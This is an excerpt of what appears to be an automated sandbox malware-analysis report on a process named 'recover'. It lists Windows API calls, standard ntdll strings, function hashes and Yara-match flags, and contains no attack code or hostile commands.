                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: b6243067ba0c3acdce8ed69db2b453a43baeb608be8fc81f25d519538e6b85b8
                                                  • Instruction ID: 91f9a22c3d6d95a461cb6a979a786482dfd7da79cfe71a59a47bd4c7a9e6f855
                                                  • Opcode Fuzzy Hash: b6243067ba0c3acdce8ed69db2b453a43baeb608be8fc81f25d519538e6b85b8
                                                  • Instruction Fuzzy Hash: 13F0927228070437E671719D9C02FDB768DDB84B61F140014FB0DAB2C0DAA1B9418AB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02D16853
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$NameName_
                                                  • String ID:
                                                  • API String ID: 3514427675-0
                                                  • Opcode ID: caf2d0d3284142ddaaef7447b1a838735f58aab17af64912bca46333b18b1ab2
                                                  • Instruction ID: 139b19318c3bcde2b3befc60a3e311066c80e33a16a70b0427d4332568ef1cff
                                                  • Opcode Fuzzy Hash: caf2d0d3284142ddaaef7447b1a838735f58aab17af64912bca46333b18b1ab2
                                                  • Instruction Fuzzy Hash: EAF039B5200209BBDA14EF59DC40EEB77ADEFC9750F504518FA09A7241DAB0F8518BB8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,02D035A0,000000F4,?,?,?,?,?), ref: 02D17BCF
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: f54b2bce93ff5924e55e021254e9b7271e351697bfdc15db76049c68c19efb1b
                                                  • Instruction ID: 4c3951fc0c13d61d6e2a589b84681b872729e0bc1c666b1fc56e8e9fc4cdd2c0
                                                  • Opcode Fuzzy Hash: f54b2bce93ff5924e55e021254e9b7271e351697bfdc15db76049c68c19efb1b
                                                  • Instruction Fuzzy Hash: 50E06D71200205BBD654EE58EC40FEB77ADDFC5710F004018FA08A7240CA70B9108BB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(02D00F16,?,02D13F13,02D00F16,02D13EB7,02D13F13,?,02D00F16,02D13EB7,00001000,?,?,02D193E0), ref: 02D17B7C
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ff35e440777bc972ecac1cc54502070d86e3574d064b99738721d16b1ccf7a39
                                                  • Instruction ID: 51b4de05f9f85d31f7f0257e1397cd2fc3e4cbd3a7a62b6c928ad6c1a77daa46
                                                  • Opcode Fuzzy Hash: ff35e440777bc972ecac1cc54502070d86e3574d064b99738721d16b1ccf7a39
                                                  • Instruction Fuzzy Hash: 54E09AB6200208BFD614EE99EC40FDB37AEEFC9710F004019FA09A7240D671BD118BB8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 02D075FC
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: d220853cefec5ef12f64ed4ba78a08560e0a494e4099597f4ec53f1c4d91c011
                                                  • Instruction ID: 6c83d4885989df58834fabfd8f22aa08d7c641a7ff99ed920fd6cd9c0a3ff747
                                                  • Opcode Fuzzy Hash: d220853cefec5ef12f64ed4ba78a08560e0a494e4099597f4ec53f1c4d91c011
                                                  • Instruction Fuzzy Hash: 1FE04F7125021427FA247AEC9C85F6A33588B89628F684A60B91D9F7D1EA79F941C190
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02D01200,02D165D7,02D13EB7,?), ref: 02D07413
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 05db5fd67c04630ae1432c1fb91f8a14646ec0f4e364ab830638520e0f6de1c7
                                                  • Instruction ID: f902354b84c6ffc20cc90a5d3fb50eba13c8488c7ca55a1e978bec1e8d0ef909
                                                  • Opcode Fuzzy Hash: 05db5fd67c04630ae1432c1fb91f8a14646ec0f4e364ab830638520e0f6de1c7
                                                  • Instruction Fuzzy Hash: 73D05E716903043BF640BAE59C42F56368D8B48768F098464BA0CEB3C2EAA5F5108565
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f8bd4a485c48c4be966262467c18d3a9d825c856396b4a5221e574323f930a43
                                                  • Instruction ID: 4e0f1f094cb89e9123f1d6150244fb1466b96778da771d06ef18c49d8e2ee9b7
                                                  • Opcode Fuzzy Hash: f8bd4a485c48c4be966262467c18d3a9d825c856396b4a5221e574323f930a43
                                                  • Instruction Fuzzy Hash: 15B09B719015C5C5DA51E76046087177A14A7D0701F19C467D3030A51E477AC5D1E179
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b199004bdabaf512df45240806d3aba0a1659eae9b8c7c77ac4969071875887
                                                  • Instruction ID: d7ea3d73eec7bd0710cacaaab35368c7d8589a5cf1598e1376b1e857eabb1219
                                                  • Opcode Fuzzy Hash: 7b199004bdabaf512df45240806d3aba0a1659eae9b8c7c77ac4969071875887
                                                  • Instruction Fuzzy Hash: 4DF0F6369016458FC722CE68E0895E8F7B1FF17726B5016DACAA45B263E313C41BCF96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: e9e277d5495fa188ff20c927066463c416e65e1d1df3c0517dc64f5f07479f49
                                                  • Instruction ID: 2416635085e277dc77df989bf8b7d7ba955f5f7295ce6bf5094789e21c7b77ce
                                                  • Opcode Fuzzy Hash: e9e277d5495fa188ff20c927066463c416e65e1d1df3c0517dc64f5f07479f49
                                                  • Instruction Fuzzy Hash: 4F51B7B5B00156AFCB10DF9988909BFF7B8BB09201714866BE479DF641D374DE418BE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034E4725
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034E46FC
                                                  • ExecuteOptions, xrefs: 034E46A0
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 034E4787
                                                  • Execute=1, xrefs: 034E4713
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034E4655
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034E4742
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: d24c0d05c1f7e013dc3f5f04fc18aeda1faeb6dcd06235298a3281ef3fa77b69
                                                  • Instruction ID: d1fb4d8780a5c7c80727159453ca4d007696ba893a077c2140cffd616874cc82
                                                  • Opcode Fuzzy Hash: d24c0d05c1f7e013dc3f5f04fc18aeda1faeb6dcd06235298a3281ef3fa77b69
                                                  • Instruction Fuzzy Hash: CE513A35A007086EDF30EBE9DC85FEE7BB8AF14311F14009BE505AF291D771AA468B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: d1d19df44044535abd488662f5e62c329b1709a7ea886ca85dcbe415a6f0c15e
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: 6E818D74E052499FDF24CE68C8917EEBBB5EF45310F1C425BD861AF390C63498518B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034E02E7
                                                  • RTL: Re-Waiting, xrefs: 034E031E
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034E02BD
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: cd2819a308796c215f0fbc3184b46db527859319bffbb55a7fe475f5d99afea7
                                                  • Instruction ID: f3099020f2c154557cd8812cd842129122e31b8d5bb7f639d7ead3d61d664ba8
                                                  • Opcode Fuzzy Hash: cd2819a308796c215f0fbc3184b46db527859319bffbb55a7fe475f5d99afea7
                                                  • Instruction Fuzzy Hash: 36E19C346047419FEB24CF29C884B6ABBE4BB84315F180A5FE4A5CF3A1D774D849CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 034E7BAC
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034E7B7F
                                                  • RTL: Resource at %p, xrefs: 034E7B8E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 130a72467ddb7c44ca0611f59bd204d3340127b593b249e19dbcb3191219e2d2
                                                  • Instruction ID: 604a9ae067737a263636f64dda4ef304363a5b4745f4ed751581a73093f3b4b9
                                                  • Opcode Fuzzy Hash: 130a72467ddb7c44ca0611f59bd204d3340127b593b249e19dbcb3191219e2d2
                                                  • Instruction Fuzzy Hash: 8F41B135700B029FC724CE29D840B6BB7E5EB98721F180A1EF956DF780DB71E4058B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034E728C
                                                  Strings
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034E7294
                                                  • RTL: Re-Waiting, xrefs: 034E72C1
                                                  • RTL: Resource at %p, xrefs: 034E72A3
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: c868ee3eab3a3063e2cfd84db7e3494c1bd7b8f1629ee1b492a08490dd73d53b
                                                  • Instruction ID: 8339d60782337f2962741eaf6830637efb840d0fa560d94b03e926bbcfde229e
                                                  • Opcode Fuzzy Hash: c868ee3eab3a3063e2cfd84db7e3494c1bd7b8f1629ee1b492a08490dd73d53b
                                                  • Instruction Fuzzy Hash: 6A41D035700706AFD720DE29CC41B6ABBA5FF94721F18061AF965AF380DB21F84687D9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction ID: 378ebb6496e8c7c83ffb21e73a6e39bd093d49bce70348641ea5b52725e8a27e
                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction Fuzzy Hash: 44915F70E0021A9EDB24DE69C8816FFBBB9AF84760F18455BE865AF3C0D7309941877C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: fef70794548f147d8c1b16424c7b13911845b19c66c52eec9ea646da03ae2325
                                                  • Instruction ID: 174f6b707ec6e80024b65d7601224fbaeb2ccceb92b54f19c0add2f019d77ca6
                                                  • Opcode Fuzzy Hash: fef70794548f147d8c1b16424c7b13911845b19c66c52eec9ea646da03ae2325
                                                  • Instruction Fuzzy Hash: D7816975D002699BDB31DB54CC54BEEB6B8AB08710F0441EBE919BB250E7709E81CFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 034FCFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: CallFilterFunc@8
                                                  • String ID: @$@4Cw@4Cw
                                                  • API String ID: 4062629308-3101775584
                                                  • Opcode ID: 70ddaf4ecb879935a57cf81cccbeeb45e4106d9729281c109f3ef25645798b96
                                                  • Instruction ID: 8b80277ce471c8cb0e7edec9da5188107312d4a6025a1a76c78562077c2933c7
                                                  • Opcode Fuzzy Hash: 70ddaf4ecb879935a57cf81cccbeeb45e4106d9729281c109f3ef25645798b96
                                                  • Instruction Fuzzy Hash: 9E417F759002189FCB21EF99D840AAEFBB8FF46B04F08452BEA14DF265D774C901DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%